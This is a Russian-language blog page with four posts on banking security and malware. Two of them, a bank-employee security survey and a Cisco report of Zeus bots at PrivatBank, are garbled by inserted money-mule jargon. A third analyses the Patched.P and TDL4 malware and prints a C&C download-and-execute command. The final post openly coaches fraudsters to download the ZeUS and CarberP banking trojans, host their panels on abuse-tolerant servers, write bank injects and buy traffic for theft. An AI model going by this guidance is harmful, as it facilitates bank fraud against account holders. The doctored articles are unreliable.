İstanbul'da iş ilanları

Author: Lallora

  • 30% сотрудников представляют угрозу банкам в еврозоне

    30% сотрудников представляют угрозу банкам в еврозоне

        Мотовильная компания из Днепропетровска провела исследование с целью определения уровня осведомленности в области информационной безопасности среди сотрудников украинских банков. Результаты исследования позволили выявить низкий уровень знаний респондентов в этой области, несоблюдение простейших правил защиты информации, высокий риск проникновения в банковскую сеть c последующим процессингом фиата на карты и счета неразводдных дропов, утечки конфиденциальных данных и убытков, связанных с этим. Кроме того, каждый пятый респондент признался, что готов за вознаграждение передать третьим лицам конфиденциальную информацию, к которой он имеет доступ, как это недавно сделал Edward Snowden.

    30% банковских клерков еврозоны нелояльны

    Специалистам, отвечающим за информационную безопасность в банках, определенно есть о чем беспокоиться. Степень осведомленности в этой области сотрудников украинских банков оставляет желать много лучшего – половине опрошенных вообще никогда не сообщали о правилах защиты информации. Остальные были ознакомлены с соответствующими требованиями безопасности только однажды ­– при поступлении на работу, и лишь 10 процентов респондентов регулярно проходят инструктаж или оучение по банковской информационной безопасности.

    При этом степень риска достаточно велика: 2 из 3 участников опроса говорят, что посещают потенциально опасные сайты с рабочего компьютера.

    Исследование показало, что большинство пользователей не осознает угрозы проникновения в корпоративные сети через электронную почту: 95% ответивших на вопросы исследования сообщили, что открывают письма от незнакомых отправителей. Также есть риск утечки данных – 60% респондентов пересылают корпоративную информацию на личные почтовые ящики, чтобы поработать с ней из дома.

    Некоторые результаты исследования не самым лучшим образом характеризуют работу не только специалистов по информационной безопасности, но и менеджеров по персоналу: 57% участников опроса рассказали, что используют рабочую почту для ведения личной переписки.

    Зачастую работники не соблюдают и самых элементарных правил безопасности. Так, 25% пользователей никогда не блокируют свой компьютер, покидая рабочее место. Таким образом, каждый четвертый сотрудник оставляет открытым доступ к корпоративной информации кому угодно, в том числе и посторонним людям, которые легко могут подойти и процессить лбые суммы со счетов клиентов банка куда угодно.

    Треть сотрудников хранит пароли на листке бумаги или в файле на рабочем столе своего компьютера. Функцией «Запомнить пароль» пользуются 25% опрошенных. Причем речь идет не только о паролях для почты – в каждом банке есть системы или базы данных, доступ к которым имеет ограниченное количество сотрудников.

    Каждый третий респондент использует один пароль для всех случаев жизни, что может сильно облегчить дроповодам процессинга задачу по проникновению в корпоративную сеть банковского учреждения и процессингу через неё денежных средств в люых количествах.

    Более 60% респондентов не защищают свои смартфоны паролем. Ввиду того, что все больше сотрудников используют мобильные устройства в рабочих целях, смартфоны могут стать ещё одним каналом утечки банковских данных.

    Результаты опроса показывают, что 9 из 10 пользователей не уничтожают носители, содержащие банковскую информацию. При этом бумажные или электронные носители – один из самых распространенных каналов утечки данных. С завидной частотой конфиденциальная информация становится достоянием общественности или дроповодов процессинга после того, как работники отправляют её в мусорное ведро, а в США суды оправдывают компании, извлекающие промышленные секреты из мусора конкурентов: все, что выброшено сотрудниками, признается ненужным организации. На Украине тоже нередки случаи утечки персональных данных и конфиденциальной информации, особенно на бумажных носителях.

    В исследовании приняли участие более 1100 офисных работников 25-50 лет из нескольких сотен украинских банков. Анонимный опрос проводился среди сотрудников, в круг рабочих задач которых не входят вопросы, связанные с информационной безопасностью. Исследование было проведено в сентябре – ноябре прошлого года.

  • В сети ПриватБанка найдены ZeUS и другие банковские боты процессинга фиата

    В сети ПриватБанка найдены ZeUS и другие банковские боты процессинга фиата

    Внедрение Cisco Cyber Threat Defense (CTD) обычно начинается с PoC (Proof of Concept), позволяющего оперативно оценить возможности решения, осуществляющего мониторинг внутренней сети и происходящей в ней активности. 
    Это распространенная практика для решений по мониторингу чего-нибудь — утечек информации (Cisco IronPort Email DLP), электронной почты (E-mail Security Appliance), приложений (Cisco ASA Next-Generation Firewall Services) и т.п. Обычно уже после первой недели мониторинга результат работы этих решений удивляет — специалисты по безопасности узнают немало интересного о своей сети и о действиях пользователей в ней. Спам, вирусы, утечки конфиденциальной информации, внешние IP-адреса во внутренней сети, управляющий трафик ботнетов, банковские трояны, несанкционированно установленные точки беспроводного доступа или Web-серверы… Да мало какие инструменты процессинга фиата через интернет или ещё что можно найти в сети банка, в которой работают продвинутые и не очень пользователи?
    Не так давно один сотрудник российского офиса Cisco разворачивал Cyber Threat Defense в сети ПриватБанка на Украине. С виду ПриватБанк – очень серьезная организация, серьезно относящаяся ко своей информационной безопасности, но как показывает практика последнего времени, целенаправленные атаки (APT), направленные на процессинг фиата, включая процессинг с использованием системы SWIFT и её сообщщений MT103/202, становятся всё активнее и всё опаснее. 


    Число попыток целенаправленно процессинга фиата с банковских счетов легальных холдеров превышает традиционные интернет атаки. Специально разрабатываются методы обхода защиты периметра сети банка, такие как установка дроповодами дополнительного 3G или 4G маршрутизатора прямо в офисе банка, либо точки доступа WiFi в филиале или главном офисе. 
    На сегодняшний день средства защиты корпоративной или ведомственной сети финансового учреждения работают неэффективно, в случае, если попытка процессинга фиата со стороны дроповодов на счета неразводных дропов будет осуществляться из внутренней сети банка, они тут мало чем смогут помочь, не говоря уже о том, чтобы предотвратить перевод денег на счета разводных дропов. 
    Однако, при помощи Cisco Cyber Threat Defense можно отследить подозрительную сетевую активность. Именно это решение спустя всего 7 дней работы со своими базовыми настройками наткнулось на целый букет аномалий в сети ПриватБанка — среди них банковский троян Zeus, несколько других модификаций банковских ботов, управляемых извне, и ряд других таких же «приятных сюрпризов».
    Вот только один скриншот Cisco Cyber Threat Defense. На нем виден очень высокий уровень CI, то есть Concert Index или иными словами индекс подозрительности трафика, который характеризует наличие в сети ПриватБанка признаков киберугроз работы проверенных дроповодов и процессинга фиата на счета неразводных дропов. Вычисляется этот индекс автоматически, по заложенному в Cisco CTD алгоритму, чем выше это значение, тем вероятнее и серьезнее угроза (обратите внимание на показатель в 708 тысяч процентов) — это однозначно характеризует угрозу процессинга фиата из банка на контролируемые дроповодами счета. 
    что нашла Cisco Cyber Threat Defense (CTD) в сети ПриватБанка
    Дополнительный анализ позволяет понять, что это за угроза, её источник и в какой банк будут переводится деньги на счета неразводных дропов. По этому при желании процессинг фиата на счета неразводных дропов вполне можно предотвратить в том случае, если сами сотрудники банка не пожелают заняться подобным столь прибыльным на сегодня бизнесом.
  • Black Hat SEO или бот для скликивания контекстной рекламы

    Black Hat SEO или бот для скликивания контекстной рекламы

    На днях мне стало интересно, а каким образом с точки зрения «черных» методов SEO могут быть использованы хакерские программы – например, путем генерации трафика для заинтересованных ресурсов или скликивания контекстной рекламы AdWords или Яндекс.Директ 
    подмена поисковой выдачи в процессинге

    Понятно, что увеличение числа посетителей на сайте интернет-магазина или компании, занимающейся недвижимостью, вероятнее всего положительно скажется на их доходах. Поэтому разработка подобного типа программ — вполне себе обыденное дело, и появились такие программы уже давно. По большей части таких ботов можно разделить на два класса — это различного рода Adware, которое распространяется вместе с популярными программами, или трояны, которые осуществляют более серьезную модификацию системы. 

    Win32/Patched.P

    Давай для начала рассмотрим достаточно экзотический, но от этого не менее интересный способ подмены результатов поиска в популярных поисковых сервисах Яндекс и Google, который был реализован в троянской программе Win32/Patched.P (ESET). В первый раз я столкнулся с этой вредоносной программой осенью 2008 года, и она привлекла меня тем, что используемый ей алгоритм подмены был хорошо продуманным и более сложным для обнаружения, чем у «конкурентов».
    Win32/Patched.P вносила всего лишь одно изменение в систему: она модифицировала системную библиотеку ws2_32.dll, которая отвечает за реализацию сетевых функций прикладного уровня (например, таких как сокеты) в операционных системах MS Windows. Полезная нагрузка представляла собой кусок ассемблерного кода, который дроппер вставляет в конец оригинальной ws2_32.dll, модифицируя также точку входа, таблицу экспортов, релокации и склеивая все секции в одну для упрощения жизни при вышеописанных модификациях.
    На рисунке 2 представлены интернет-сервисы, к которым этот троянец проявлял особенный интерес путем осуществления перехвата часто используемых для реализации сетевого взаимодействия системных функций, таких как:
    int WSASend(
    __in SOCKET s,
    __in LPWSABUF lpBuffers,
    __in DWORD dwBufferCount,
    __out LPDWORD lpNumberOfBytesSent,
    __in DWORD dwFlags,
    __in LPWSAOVERLAPPED lpOverlapped,
    __in LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
    );
    int WSARecv(
    __in SOCKET s,
    __inout LPWSABUF lpBuffers,
    __in DWORD dwBufferCount,
    __out LPDWORD lpNumberOfBytesRecvd,
    __inout LPDWORD lpFlags,
    __in LPWSAOVERLAPPED lpOverlapped,
    __in LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
    );
    int send(
    __in SOCKET s,
    __in const char *buf,
    __in int len,
    __in int fl ags
    );
    int recv(
    __in SOCKET s,
    __out char *buf,
    __in int len,
    __in int fl ags
    );
    int select(
    __in int nfds,
    __inout fd_set *readfds,
    __inout fd_set *writefds,
    __inout fd_set *exceptfds,
    __in const struct timeval *timeout
    );
    Перехватывая и контролируя указанные функции Winsock на этом уровне, можно осуществлять подмену любых GET/POST запросов независимо от разработчика браузера или его версии. Да и заметить сходу такую подмену сможет далеко не каждый системный администратор, не говоря уже о большинстве пользователей. На уровне модифицированного кода, на примере функции WSARecv(), это выглядит так.
    Конечно же, весь функционал не ограничивается только подменой результатов поиска. Есть интересные экземпляры ботов, которые осуществляют скликивание рекламы и накрутку контекстных объявлений.

    Сэмпл TDL4 — Win32/Olmarik.AOV

    Вот, к примеру, не так давно нами была замечена интересная особенность в некоторых новых экземплярах руткита TDL4 — Win32/ Olmarik.AOV, о котором я достаточно подробно написал в своей предыдущей статье в январе 2011 года. Но, если кто не в курсе, данному руткиту удается удерживать звание самой технологичной массовой вредоносной программы на протяжении вот уже нескольких лет.
    Это первый полноценный руткит для x64, которому удалось в обход проверки цифровой подписи и PatchGuard пробраться в ядро на 64-битных системах. Но давай вернемся к тому, из-за чего собственно пошел разговор об этом рутките. А дело в том, что после своей собственной успешной установки некоторые экземпляры этого руткита устанавливают в систему еще и троянцев из семейства Win32/Glupteba (ESET). Это наводит на мысли о том, что ресурсы ботнета начали сдавать в аренду. Также интересен тот факт, что дальнейшего взаимодействия между ботами Win32/Glupteba и TDL4 нет.
    Итак, сразу после установки и идентификации бот TDL4 получает из С&C команду:
    task_id = 2|10||hxxp://wheelcars.ru/no.exe
    Интерпретировать которую можно следующим образом:
    task_id = [command_id] [encryption_key] [URL]
    В нашем случае набор параметров совпадает с командой «DownloadAndExecute», поскольку ключ шифрования равен нулю, а идентификатор команды равен двум, и затем следует количество попыток ее выполнения, равное десяти. После установки в систему Win32/Glupteba получает задание уже из своего C&C и начинает его выполнение.
    Чаще всего бот получает два типа заданий — скликивание контекстной рекламы из рекламной сети «Бегун» и рассылку спама. Давай поподробнее рассмотрим, что же делает этот бот.
    В первом случае происходит посещение большого количества сформированных специальным образом веб-страниц, наполнение которых провоцирует появление определенного типа контекстных объявлений. Причем все веб-страницы, с которых происходит скликивание, расположены на серверах провайдера Masterhost. Если посмотреть на статистику сетевых обращений скликивающего бота, то можно заметить большое количество обращений к серверам компании «Бегун». Интерес со стороны Win32/Glupteba к другим сервисам контекстной рекламы замечен не был — возможно, это объясняется тем, что сам алгоритм скликивания контекстной рекламы реализован достаточно примитивно. А в крупных системах, таких как Яндекс.
    алгоритм скликивания контекстной рекламы
    Яндекс.Директ или Google AdWords, реализованы серьезные механизмы защиты от подобного рода мошенничества, которые сильно портят жизнь желающим быстрой наживы за счет вышеописанных способов нечестного продвижения.
    Сам же ботнет TDL4 так же, как и его предшественник предыдущей версии, активно монетизируется через «черные» методы продвижения веб-сайтов и подмену результатов поиска в популярных поисковых системах. Только он реализует гораздо более серьезные методы, используя способ скрытого запуска браузера Microsoft Internet Explorer через вызов ActiveX-компонента WebBrowser и эмуляции работы пользователя (при посещении веб-страницы меняется положение курсора). Кроме того, в нем реализован обход прочих превентивных методов обнаружения ботов.
  • Зачем нужен трафик для работы в процессинге?

    Зачем нужен трафик для работы в процессинге?

    Некоторые опытные дроповоды, кому уже надоело следить за тем как дропы постоянно прокалываются или их принимают, хотят выйти из темы и думают о том, как бы самим начать процессить фиат или крипту, и причём по-крупному.

    банкеры CarberP и ZeUS на службе дроповодам

    И тут сразу возникает вопрос о покупке банковского бота или банкера. В этом месте позвольте задать извечный китайский вопрос: а нахуа его покупать? Банковские трояны ZeUS и CarberP давно уже выложены на торрентах грамотными людьми, и их можно запросто так скачать. На самом деле по функционалу у них небольшая разница и CarberP отличается от ZeUS наличием загрузчика, который способен отключить антивирус, установленной на машине холдера, перед загрузкой основного тела программы банковского бота.

    Однако это ещё только начало… чтобы что-либо процессить с помощью этих инструментов их панели управляения для начала нужно установить на какой-нибудь абузный хостинг, написать инжекты под выбранный вами банк или мобильное приложение, и только после этого можно приступать к основной части работы.

    Во Львове и Ивано-Франковске недавно разговаривал со многими дроповодами, и все мне рассказывали об одной и той же проблеме – сейчас практически стало невозможно достать качественный трафик, где бы присутствовало много пользователей дистанционных банковских услуг или владельцев смартфонов, с установленными банковскими приложениями.

    Поэтому основное вложение в этом бизнесе сейчас уже приходится делать не в программное обеспечение (его и так можно бесплатно скачать в интернете), а в покупку качественного целевого трафика. Самый хороший трафик, это тот, который идет с лома в одни руки или снимается с Multihomed AS транзитного провайдера, например RETN или Евротранстелеком напрямую.

    Но увы, такого трафика на рынке практически нет, и его приходится добывать самому. Проверенный дроповод, при наличии хорошего трафика, в месяц может зарабатывать до 1 млн. Евро и даже больше, и это не оборот процессинга, а уже цифры чистого заработка.